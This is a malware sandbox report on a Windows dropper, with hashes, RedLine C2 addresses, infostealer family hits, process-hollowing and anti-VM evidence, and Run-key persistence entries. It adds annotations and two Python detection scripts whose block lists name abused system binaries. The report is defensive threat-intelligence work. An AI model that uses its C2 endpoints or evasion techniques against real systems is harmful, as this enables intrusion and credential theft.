Analysis
- max time kernel: 219s
- max time network: 1804s
- platform: windows11_x64
- resource: win11
- submitted: 21-08-2021 07:42
Static task: static1
Behavioral task behavioral1: sample C0672CA6E505B76756AC421EF9D33409.bin.exe on resource win7v20210410
Behavioral task behavioral2: sample C0672CA6E505B76756AC421EF9D33409.bin.exe on resource win11
Behavioral task behavioral3: sample C0672CA6E505B76756AC421EF9D33409.bin.exe on resource win10v20210408
Every memory-dump IoC on this page (behavioral2/memory/...) comes from behavioral2, the win11 run.
General
- Target: C0672CA6E505B76756AC421EF9D33409.bin.exe
- Size: 7.9MB
- MD5: c0672ca6e505b76756ac421ef9d33409
- SHA1: a773fe4c53105ae987d6c4cebaf3095102a6f103
- SHA256: b01b61c911a3b80d4f265e4915f9d62275efa34f84989f77be142f3f9e062f9b
- SHA512: b928cf61eb3dfc1503692a1db54ede52bd2c29b836198ded91d94e414e8bb3012ef3bb2b2e145358951252778403665ea8e9b5eef34fe22f329fc6a5947a0e55
Malware Config
Extracted
  Family: metasploit
  Payload: windows/single_exec
Extracted
  Family: redline
  Botnet: www
  C2: 185.204.109.146:54891
Extracted
  Family: redline
  Botnet: Second_7.5K
  C2: 45.14.49.200:27625
Signatures
-
Glupteba Payload 1 IoCs
Processes (resource yara_rule):
  behavioral2/memory/3792-184-0x00000000052E0000-0x0000000005C06000-memory.dmp family_glupteba
pid 3792 is Info.exe in the "Executes dropped EXE" list below.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as legitimate system administration software. The report lists no IoC rows for this signature, so the hit is signature-only.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process):
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3788 | 4780 | rUNdlL32.eXe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6952 | 4484 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5556 | 4484 | rundll32.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6056 | 4484 | rundll32.exe
Note the mixed-case image name rUNdlL32.eXe in the first row: Windows resolves it to rundll32.exe, but a case-sensitive detection rule keyed on "rundll32.exe" would miss it.
-
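The parent/child check behind this signature, as an added example rather than the sandbox vendor's code. The events are constructed Sysmon-style records that mirror the four rows above; the report prints pid and pid_target without naming which is the parent, so treating pid_target (4780, 4484) as the wmiprvse.exe parent is an assumption. The allow-list contents, the LOLBIN list and the severity scheme are also this example's choices.

```python
"""Parent/child process-creation check modelled on the
"Process spawned unexpected child process" signature.

Added example, not the sandbox vendor's code. Events are constructed
Sysmon-style records; the parent/child pid pairing is an assumption.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the creating process
    cmdline: str = ""


# Parents that should not be spawning arbitrary children. The value is the
# set of child image names tolerated for that parent; an empty set means any
# child is reported. wmiprvse.exe comes from the report; treating it as
# "spawns nothing" is this example's assumption, tune it per environment.
WATCHED_PARENTS = {
    "wmiprvse.exe": frozenset(),
}

# Living-off-the-land binaries: an unexpected child from this set is rated high.
LOLBINS = frozenset({
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "powershell.exe",
    "cmd.exe", "wscript.exe", "cscript.exe", "certutil.exe",
})


def image_name(path: str) -> str:
    """Basename, case-folded. The report's 'rUNdlL32.eXe' must still match
    'rundll32.exe': NTFS lookups are case-insensitive, so a case-sensitive
    rule is a trivial bypass. ntpath handles backslash paths on any OS."""
    return ntpath.basename(path).lower()


def check_event(ev: ProcEvent):
    """Return a finding dict for an unexpected parent/child pair, else None."""
    parent = image_name(ev.parent_image)
    child = image_name(ev.image)
    allowed = WATCHED_PARENTS.get(parent)
    if allowed is None or child in allowed:
        return None
    return {
        "parent": parent,
        "ppid": ev.ppid,
        "child": child,
        "pid": ev.pid,
        "severity": "high" if child in LOLBINS else "medium",
        "reason": f"Parent {ev.parent_image} is not expected to spawn {child}",
    }


def scan(events):
    return [f for f in (check_event(e) for e in events) if f is not None]


WMIPRVSE = r"C:\Windows\system32\wbem\wmiprvse.exe"

# Constructed events. The first four mirror the report's rows (pids 3788/4780
# and 6952, 5556, 6056 under 4484), assuming pid_target is the parent.
SAMPLE_EVENTS = [
    ProcEvent(3788, 4780, r"C:\Windows\System32\rUNdlL32.eXe", WMIPRVSE),
    ProcEvent(6952, 4484, r"C:\Windows\System32\rundll32.exe", WMIPRVSE),
    ProcEvent(5556, 4484, r"C:\Windows\System32\rundll32.exe", WMIPRVSE),
    ProcEvent(6056, 4484, r"C:\Windows\System32\rundll32.exe", WMIPRVSE),
    # Benign context (constructed): the WMI host started by services.exe, and a
    # user launching rundll32 from Explorer, are outside the watched parents.
    ProcEvent(4484, 644, WMIPRVSE, r"C:\Windows\System32\services.exe"),
    ProcEvent(8100, 4300, r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"], f["pid"], f["reason"])
```

In production the same fields come from Sysmon Event ID 1 (Image, ParentImage, ProcessId, ParentProcessId); the rule is scoped to the parent on purpose, since rundll32.exe under explorer.exe is everyday activity and only the wmiprvse.exe lineage is the anomaly.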
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes (resource yara_rule):
  C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe family_redline
  C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe family_redline
  C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe family_redline
  C:\Users\Admin\Documents\8hYCRVQG3M8blCFUnrCF4_z3.exe family_redline
  behavioral2/memory/2728-363-0x0000000000000000-mapping.dmp family_redline
  behavioral2/memory/3424-391-0x0000000000000000-mapping.dmp family_redline
  behavioral2/memory/3836-375-0x0000000000000000-mapping.dmp family_redline
The three memory matches (pids 2728, 3424, 3836) are exactly the target processes of the SetThreadContext rows further down, i.e. the RedLine payloads were unpacked into hollowed processes rather than run from the dropped files.
-
Socelars Payload 2 IoCs
Processes (resource yara_rule):
  C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars
  C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars
-
Suspicious use of NtCreateProcessExOtherParentProcess 22 IoCs
Processes (pid process -> created pid_target target process):
  2108 WerFault.exe -> 860 pub2.exe
  4620 WerFault.exe -> 3792 Info.exe
  4592 WerFault.exe -> 2288 rundll32.exe
  4628 WerFault.exe -> 744 Install.exe
  3840 WerFault.exe -> 3636 HigBkRPx0qyWn99cHptOkbti.exe
  3616 WerFault.exe -> 3904 gq7BdFzcCpgT9R8qUlDBiVoJ.exe
  1720 WerFault.exe -> 5080 AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
  2832 WerFault.exe -> 3896 ZH_D8d_woMBuwaliVLK7dXsO.exe
  4112 Setup.exe -> 4844 n5iK85pyxBdO3WOr6bRNQ6xx.exe
  976 WerFault.exe -> 1524 LGCH2-401_2021-08-18_14-40.exe
  1480 WerFault.exe -> 4612 TNGkwm8vY3ofA8gUTLfxgcxK.exe
  2568 WerFault.exe -> 2384 askinstall53.exe
  7040 MsiExec.exe -> 6248 bEQOSwZfLy35v67HMStZes1l.exe
  6264 WerFault.exe -> 4640 WchvfjN_dzKFtUxFm7qRXxfF.exe
  7096 WerFault.exe -> 3116 rundll32.exe
  3124 WerFault.exe -> 6392 msedge.exe
  6752 WerFault.exe -> 6236 msedge.exe
  1856 WerFault.exe -> 3712 6609898.exe
  6684 WerFault.exe -> 6492 asMNUD7Whzsx89sAGP_aLokg.exe
  6480 WerFault.exe -> 1212 rundll32.exe
  6704 WerFault.exe -> 5880 8324748.exe
  700 (process name missing in the report) -> 5132 vdi_compiler.exe
Every WerFault.exe row here pairs with a "Program crash" row below for the same target pid, so read the two tables together. Several pids (1480, 1856, 3124, 4628) are attributed to WerFault.exe here and to dropped executables in "Executes dropped EXE"; pids are reused over a 1804s run, so match on pid plus process name, never pid alone.
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes (resource yara_rule):
  behavioral2/memory/3904-298-0x0000000004A30000-0x0000000004ACD000-memory.dmp family_vidar
  behavioral2/memory/1524-464-0x0000000004AE0000-0x0000000004B7D000-memory.dmp family_vidar
pid 3904 is gq7BdFzcCpgT9R8qUlDBiVoJ.exe and pid 1524 is LGCH2-401_2021-08-18_14-40.exe in the "Executes dropped EXE" list; both later crash (see "Program crash").
-
Blocklisted process makes network request 5 IoCs
Processes (flow pid process):
  281 4056 MsiExec.exe
  286 4056 MsiExec.exe
  290 4056 MsiExec.exe
  293 4056 MsiExec.exe
  295 4056 MsiExec.exe
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes (description ioc process):
  File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe
The file touched is the hosts file, not a driver: a write there lets the sample redirect or block name resolution (typically security-vendor or update domains) for every process on the host, so check the hosts file during cleanup.
-
Executes dropped EXE 64 IoCs
Processes (pid process):
  3900 KRSetp.exe
  3528 Folder.exe
  3792 Info.exe
  4464 File.exe
  860 pub2.exe
  744 Install.exe
  1268 jamesold.exe
  3124 md9_1sjm.exe
  1888 Files.exe
  3480 Folder.exe
  1672 jfiag3g_gg.exe
  3764 jfiag3g_gg.exe
  5080 AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
  1252 fy9NfATq_QWOepz6ymSl2HMo.exe
  3904 gq7BdFzcCpgT9R8qUlDBiVoJ.exe
  4612 TNGkwm8vY3ofA8gUTLfxgcxK.exe
  5116 tjy1GrraGlAjKtsTJ6fwTeqw.exe
  1856 KlF1TC_kNM1irfli5mSNl_JB.exe
  4308 dcN39oeQcO1TI8LbRct_X8zm.exe
  3636 HigBkRPx0qyWn99cHptOkbti.exe
  1480 Y7aLf8zJ97XcPikNEtC8S9tn.exe
  1612 kkDrRR_yCJmCdQFYoj6gRE_m.exe
  2988 2u55W290oBvJVcrb8gcaR3aD.exe
  3068 8hYCRVQG3M8blCFUnrCF4_z3.exe
  1004 F8iDNg2j1mYQjJrSJjuQ9boD.exe
  1568 JJPVa_sOJMzqe2j7ZHG84SEf.exe
  3712 2D6KXJ4Sih2rnKqehqnnaTsh.exe
  3896 ZH_D8d_woMBuwaliVLK7dXsO.exe
  1648 WNJCVPrW3aAcLvQSoBp1SYrf.exe
  2712 n5iK85pyxBdO3WOr6bRNQ6xx.exe
  3176 YqIXiCL33maLAy2OB92ojfwd.exe
  732 jooyu.exe
  3396 md8_8eus.exe
  4200 customer3.exe
  2792 YqIXiCL33maLAy2OB92ojfwd.tmp
  3428 msedge.exe
  2728 KlF1TC_kNM1irfli5mSNl_JB.exe
  3836 svchost.exe
  4844 n5iK85pyxBdO3WOr6bRNQ6xx.exe
  804 8473479.exe
  3424 Esplorarne.exe.com
  3712 6609898.exe
  1396 11111.exe
  1436 8259576.exe
  1524 LGCH2-401_2021-08-18_14-40.exe
  2144 Inlog.exe
  2508 Cleaner Installation.exe
  1264 WEATHER Manager.exe
  1244 Inlog.tmp
  860 Esplorarne.exe.com
  2380 VPN.exe
  2332 Conhost.exe
  4628 md7_7dfj.exe
  2840 VPN.tmp
  2384 askinstall53.exe
  3948 MediaBurner2.exe
  5388 MediaBurner2.tmp
  5468 11111.exe
  5564 WinHoster.exe
  3740 PBrowFile15.exe
  5320 3377047_logo_media.exe
  4228 11111.exe
  5356 zhaoy-game.exe
  1684 MaskVPNUpdate.exe
Several dropped files borrow the names of system or browser binaries (svchost.exe 3836, msedge.exe 3428, Conhost.exe 2332); these are files written by the sample, not the Windows binaries, so a name-only allow-list would pass them.
-
UPX packer (yara_rule upx) 4 IoCs
Processes (resource yara_rule):
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx (the same path is listed four times)
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (each of the eight files queries both SystemBiosVersion and VideoBiosVersion under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System):
  F8iDNg2j1mYQjJrSJjuQ9boD.exe
  0bM853sXZJfrnu2mWSAOETVc.exe
  tjy1GrraGlAjKtsTJ6fwTeqw.exe
  dcN39oeQcO1TI8LbRct_X8zm.exe
  WNJCVPrW3aAcLvQSoBp1SYrf.exe
  7vrT3uOZl1qmiSYlZrNbnZUH.exe
  NwFGfQ4gWNhniyDRsfbdyZxN.exe
  5uJnm0wkHdqW1g5_jI555vTL.exe
-
Loads dropped DLL 43 IoCs
Processes (pid process, number of rows):
  2288 rundll32.exe (1)
  2792 YqIXiCL33maLAy2OB92ojfwd.tmp (2)
  2508 Cleaner Installation.exe (1)
  1244 Inlog.tmp (2)
  2332 Conhost.exe (2)
  2840 VPN.tmp (2)
  5388 MediaBurner2.tmp (1)
  132 Setup.exe (1)
  6892 t32Ur7ILpInlYyJRLs12SnLx.tmp (2)
  3116 rundll32.exe (1)
  4276 Setup.tmp (8)
  7040 MsiExec.exe (2)
  5508 Setup.tmp (1)
  5216 MsiExec.exe (3)
  1212 rundll32.exe (1)
  3212 GameBoxWin64.exe (3)
  4056 MsiExec.exe (2)
  5276 svrwebui.exe (6)
  5372 MsiExec.exe (2)
Conhost.exe (pid 2332) here is the dropped executable of that name from "Executes dropped EXE", not the system console host.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer (yara_rule themida) 7 IoCs
Processes (resource yara_rule):
  C:\Users\Admin\Documents\F8iDNg2j1mYQjJrSJjuQ9boD.exe themida (2 rows)
  C:\Users\Admin\Documents\tjy1GrraGlAjKtsTJ6fwTeqw.exe themida (2 rows)
  C:\Users\Admin\Documents\dcN39oeQcO1TI8LbRct_X8zm.exe themida (2 rows)
  C:\Users\Admin\Documents\WNJCVPrW3aAcLvQSoBp1SYrf.exe themida (1 row)
These four files are among those that query the BIOS version strings above and call NtSetInformationThread(ThreadHideFromDebugger) below, which is consistent with Themida's built-in anti-debug and anti-VM checks rather than logic in the payload itself.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes (description ioc process):
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8259576.exe
The first entry is machine-wide (HKLM, 32-bit WOW6432Node view) and the second is per-user (HKU\<SID>); both point into user-writable directories under the profile.
-
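A persistence audit over rows in this table's format, as an added example that is not the sandbox vendor's code. The first two sample lines are the report's own rows copied verbatim (doubled backslashes and the "haleng.ex" extension exactly as printed); the third line, the SecurityHealth entry, is constructed as a benign contrast. The set of user-writable directories is this example's assumption.

```python
"""Audit Run-key persistence rows like the two the report lists.

Added example; not the sandbox vendor's code. The first two SAMPLE_LINES are
copied from the report (doubled backslashes and 'haleng.ex' exactly as
printed); the third is a constructed benign entry for contrast.
"""
import re

SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8259576.exe',
    # constructed: a vendor entry under Program Files, for contrast
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = "C:\\Program Files\\Windows Defender\\MSASCuiL.exe" explorer.exe',
]

# 'Set value (<type>) <key>\<name> = "<data>" <process>'; the greedy \S+ on the
# key backtracks so that <name> is the last path component.
LINE_RE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\\S+)\\(?P<name>[^\\\s]+)'
    r' = "(?P<data>.*)" (?P<proc>\S+)$'
)
# \REGISTRY\MACHINE\... is HKLM; \REGISTRY\USER\<SID>\... is that user's HKU hive.
HIVE_RE = re.compile(r'^\\REGISTRY\\(MACHINE|USER\\(S-1-[\d-]+))\\', re.I)

RUN_KEYS = ("\\microsoft\\windows\\currentversion\\run",
            "\\microsoft\\windows\\currentversion\\runonce")
# Directories an unprivileged user can write to (assumption: extend per site).
# A Run entry pointing here is the dropper pattern; Program Files needs admin
# rights to write, so a vendor entry there is the normal case.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\",
                 "\\temp\\", "\\downloads\\")


def audit_line(line):
    """Parse one row; return None if it is not a Run/RunOnce write."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    key = m["key"]
    if not key.lower().endswith(RUN_KEYS):
        return None
    hm = HIVE_RE.match(key)
    sid = hm.group(2) if hm else None
    hive = "HKU" if sid else ("HKLM" if hm else "?")
    target = m["data"].replace("\\\\", "\\")   # undo the report's escaping
    reasons = []
    if any(p in target.lower() for p in USER_WRITABLE):
        reasons.append("target lives in a user-writable directory")
    return {
        "hive": hive,
        "sid": sid,
        "view": "WOW6432Node (32-bit view)" if "\\wow6432node\\" in key.lower() else "native",
        "scope": "all users at logon" if hive == "HKLM" else f"user {sid} only",
        "name": m["name"],
        "target": target,
        "process": m["proc"],
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


def audit(lines):
    return [r for r in (audit_line(l) for l in lines) if r is not None]


if __name__ == "__main__":
    for r in audit(SAMPLE_LINES):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f'{flag:10} {r["hive"]:4} {r["view"]:26} {r["name"]:15} -> {r["target"]}  (by {r["process"]})')
```

The hive split matters for response: the HKU entry only fires for the SID shown, while the HKLM entry (which the sample could write because the sandbox runs as Admin) fires for every account at logon.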
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled (EnableLUA) 9 IoCs
Processes (each queries \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA):
  WNJCVPrW3aAcLvQSoBp1SYrf.exe
  5uJnm0wkHdqW1g5_jI555vTL.exe
  md9_1sjm.exe
  tjy1GrraGlAjKtsTJ6fwTeqw.exe
  dcN39oeQcO1TI8LbRct_X8zm.exe
  7vrT3uOZl1qmiSYlZrNbnZUH.exe
  NwFGfQ4gWNhniyDRsfbdyZxN.exe
  0bM853sXZJfrnu2mWSAOETVc.exe
  F8iDNg2j1mYQjJrSJjuQ9boD.exe
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes (File opened (read-only) \??\<letter>:, grouped by process):
  GameBoxWin64.exe (16): B, E, F, G, H, I, K, M, N, O, P, R, T, V, W, Y
  Cleaner Installation.exe (17): A, B, E, G, H, I, K, L, N, O, P, S, T, U, X, Y, Z
  msiexec.exe (17): B, E, F, G, I, L, N, O, P, R, S, T, U, V, W, X, Z
  Setup.exe (14): H, I, K, L, O, Q, R, S, T, U, V, W, X, Y
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow ioc):
  245 ipinfo.io
  15 ip-api.com
  47 ipinfo.io
  139 ipinfo.io
  141 ipinfo.io
  166 ipinfo.io
  180 ipinfo.io
  15 ipinfo.io
  107 ipinfo.io
  136 ipinfo.io
-
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes (pid process):
  1004 F8iDNg2j1mYQjJrSJjuQ9boD.exe
  5116 tjy1GrraGlAjKtsTJ6fwTeqw.exe
  4308 dcN39oeQcO1TI8LbRct_X8zm.exe
  1648 WNJCVPrW3aAcLvQSoBp1SYrf.exe
  6408 7vrT3uOZl1qmiSYlZrNbnZUH.exe
  6400 NwFGfQ4gWNhniyDRsfbdyZxN.exe
  6376 5uJnm0wkHdqW1g5_jI555vTL.exe
  4592 0bM853sXZJfrnu2mWSAOETVc.exe
-
Suspicious use of SetThreadContext 6 IoCs
Processes (pid process -> set thread context of pid_target target process):
  1856 WerFault.exe -> 2728 KlF1TC_kNM1irfli5mSNl_JB.exe
  1612 kkDrRR_yCJmCdQFYoj6gRE_m.exe -> 3836 svchost.exe
  1568 JJPVa_sOJMzqe2j7ZHG84SEf.exe -> 3424 Esplorarne.exe.com
  5064 cmd.exe -> 5288 rQWlsYju61VFwsMGUM6zDgsi.exe
  5704 9VfyAu5Y5h33aHpqD2aHew95.exe -> 6336 11111.exe
  6476 DeHSDgDwlyn6MuTw6HCcYCrn.exe -> 1864 DeHSDgDwlyn6MuTw6HCcYCrn.exe
Setting the thread context of another process is the hand-off step of process hollowing (RunPE): the loader creates the target suspended, writes the payload into it, repoints the main thread and resumes it. Targets 2728, 3424 and 3836 are the three memory mappings matched as family_redline above; the last row is the self-hollowing variant, where the file starts a second copy of its own image as the host. pid 1856 is listed as WerFault.exe here but as KlF1TC_kNM1irfli5mSNl_JB.exe in "Executes dropped EXE", another case of pid reuse to resolve by name plus pid.
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
Processes (resource yara_rule):
  C:\Users\Admin\AppData\Local\Temp\jamesold.exe autoit_exe
  C:\Users\Admin\AppData\Local\Temp\jamesold.exe autoit_exe
-
Drops file in Program Files directory 64 IoCs
Processes (grouped by writing process; paths relative to C:\Program Files (x86)):
  Setup.tmp, File created (32):
    MaskVPN\is-0DQIK.tmp, MaskVPN\is-3BN1U.tmp, MaskVPN\is-BMLQD.tmp, MaskVPN\is-S6CB1.tmp, MaskVPN\is-D7UKA.tmp, MaskVPN\is-0CGQ1.tmp, MaskVPN\is-ADLR4.tmp, MaskVPN\is-KIBEN.tmp, MaskVPN\is-OR833.tmp, MaskVPN\is-TQOGM.tmp, MaskVPN\is-A8N91.tmp
    MaskVPN\driver\win732\is-4M4I9.tmp, MaskVPN\driver\win732\is-N9P3G.tmp, MaskVPN\driver\win732\is-MPGCT.tmp, MaskVPN\driver\win732\is-I2RUC.tmp
    MaskVPN\driver\win764\is-KMGQH.tmp, MaskVPN\driver\win764\is-M3Q8D.tmp, MaskVPN\driver\win764\is-TDDSI.tmp
    MaskVPN\driver\winxp32\is-24I6F.tmp, MaskVPN\driver\winxp32\is-F7E2A.tmp, MaskVPN\driver\winxp32\is-3503V.tmp, MaskVPN\driver\winxp32\is-5HJ6I.tmp, MaskVPN\driver\winxp32\is-U0LMG.tmp
    MaskVPN\driver\winxp64\is-LKDVJ.tmp, MaskVPN\driver\winxp64\is-3IRMH.tmp, MaskVPN\driver\winxp64\is-R1BUK.tmp
    INL Corpo Brovse\is-3BO1N.tmp, INL Corpo Brovse\unins000.dat, INL Corpo Brovse\is-0C4HR.tmp, INL Corpo Brovse\is-3UUG2.tmp, INL Corpo Brovse\is-S9U67.tmp, INL Corpo Brovse\is-DBMV3.tmp
  Setup.tmp, File opened for modification (16):
    MaskVPN\unins000.dat, MaskVPN\tunnle.dll, MaskVPN\tunnle.exe, MaskVPN\MaskVPNUpdate.exe, MaskVPN\mask_svc.exe, MaskVPN\MaskVPN.exe, MaskVPN\polstore.dll, MaskVPN\libMaskVPN.dll, MaskVPN\libeay32.dll, MaskVPN\libCommon.dll
    MaskVPN\driver\win732\tapinstall.exe, MaskVPN\driver\win764\tapinstall.exe, MaskVPN\driver\winxp32\devcon.exe, MaskVPN\driver\winxp64\devcon.exe
    INL Corpo Brovse\QtProfiler.exe, INL Corpo Brovse\unins000.dat
  8473479.exe, File opened for modification (12):
    GameBox INC\GameBox\MediaBurner2.exe, GameBox INC\GameBox\askinstall53.exe, GameBox INC\GameBox\PBrowFile15.exe, GameBox INC\GameBox\Cleaner Installation.exe, GameBox INC\GameBox\LivelyScreenRecS1.9.exe, GameBox INC\GameBox\Inlog.exe, GameBox INC\GameBox\md7_7dfj.exe, GameBox INC\GameBox\xtect12.exe, GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe, GameBox INC\GameBox\GameBoxWin64.exe, GameBox INC\GameBox\WEATHER Manager.exe, GameBox INC\GameBox\VPN.exe
  2D6KXJ4Sih2rnKqehqnnaTsh.exe (4):
    File created Company\NewProduct\Uninstall.ini
    File opened for modification Company\NewProduct\md8_8eus.exe, Company\NewProduct\jooyu.exe, Company\NewProduct\customer3.exe
-
Drops file in Windows directory 8 IoCs
Processes (description ioc process):
  File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe
  File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe
  File created C:\Windows\Installer\f768f0d.msi msiexec.exe
  File opened for modification C:\Windows\Installer\f768f0d.msi msiexec.exe
  File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe
  File opened for modification C:\Windows\Installer\MSIBBF9.tmp msiexec.exe
  File opened for modification C:\Windows\Installer\MSIF692.tmp msiexec.exe
  File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's canned note calls this likely ransomware behaviour; no file encryption, ransom note or extension change is recorded anywhere in this report, and the drive enumeration listed above comes from installer-type processes (msiexec.exe, Setup.exe, GameBoxWin64.exe, Cleaner Installation.exe), so treat this hit as installer noise unless other evidence appears.
-
Program crash 26 IoCs
Processes (pid WerFault.exe -> pid_target crashed process):
  4608 -> 860 pub2.exe
  3736 -> 3792 Info.exe
  3660 -> 2288 rundll32.exe
  3548 -> 744 Install.exe
  668 -> 3904 gq7BdFzcCpgT9R8qUlDBiVoJ.exe
  3832 -> 3636 HigBkRPx0qyWn99cHptOkbti.exe
  4164 -> 5080 AE4Cr0V8AbXUi2Vh3WIgJzcr.exe
  2184 -> 3896 ZH_D8d_woMBuwaliVLK7dXsO.exe
  2796 -> 1524 LGCH2-401_2021-08-18_14-40.exe
  4824 -> 4612 TNGkwm8vY3ofA8gUTLfxgcxK.exe
  3532 -> 4844 n5iK85pyxBdO3WOr6bRNQ6xx.exe
  5508 -> 2384 askinstall53.exe
  6332 -> 6248 bEQOSwZfLy35v67HMStZes1l.exe
  7112 -> 4640 WchvfjN_dzKFtUxFm7qRXxfF.exe
  5744 -> 3116 rundll32.exe
  3728 -> 6236 xLqNvme6hoDlPTgBHwIDSLik.exe
  6984 -> 6392 ewz7aGhr4LCktqJ0Uq05IHJx.exe
  5948 -> 3712 6609898.exe
  3240 -> 6492 asMNUD7Whzsx89sAGP_aLokg.exe
  6740 -> 1212 rundll32.exe
  1536 -> 5880 8324748.exe
  6628 -> 5132 vdi_compiler.exe
  5340 -> 5212 5999348.exe
  6180 -> 6800 GcleanerEU.exe
  6128 -> 6456 gcleaner.exe
  6340 -> 1752 rundll32.exe
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (description ioc process):
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 svchost.exe
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 svchost.exe
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (all paths under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0; counts are rows in the report):
  WerFault.exe (49 rows): key opened x6; values queried: Identifier x9, Update Revision x9, ~MHz x8, Platform Specific Field 1 x7, ProcessorNameString x6, VendorIdentifier x4
  Esplorarne.exe.com (5 rows): VendorIdentifier, Platform Specific Field 1, ProcessorNameString, Identifier, ~MHz
  Setup.tmp (3 rows): key opened; Identifier, Update Revision
  process name missing in the report (7 rows): key opened; VendorIdentifier, ProcessorNameString, Identifier, Update Revision, ~MHz, Platform Specific Field 1
WerFault.exe (crash reporting) and Setup.tmp (an installer) read CentralProcessor\0 as part of normal operation, so 52 of the 64 rows carry no anti-sandbox signal on their own; the Esplorarne.exe.com rows, from the SetThreadContext target whose memory matched family_redline, are the ones worth attention.
-
Enumerates system info in registry 2 TTPs 42 IoCs
Processes:
description | ioc | process
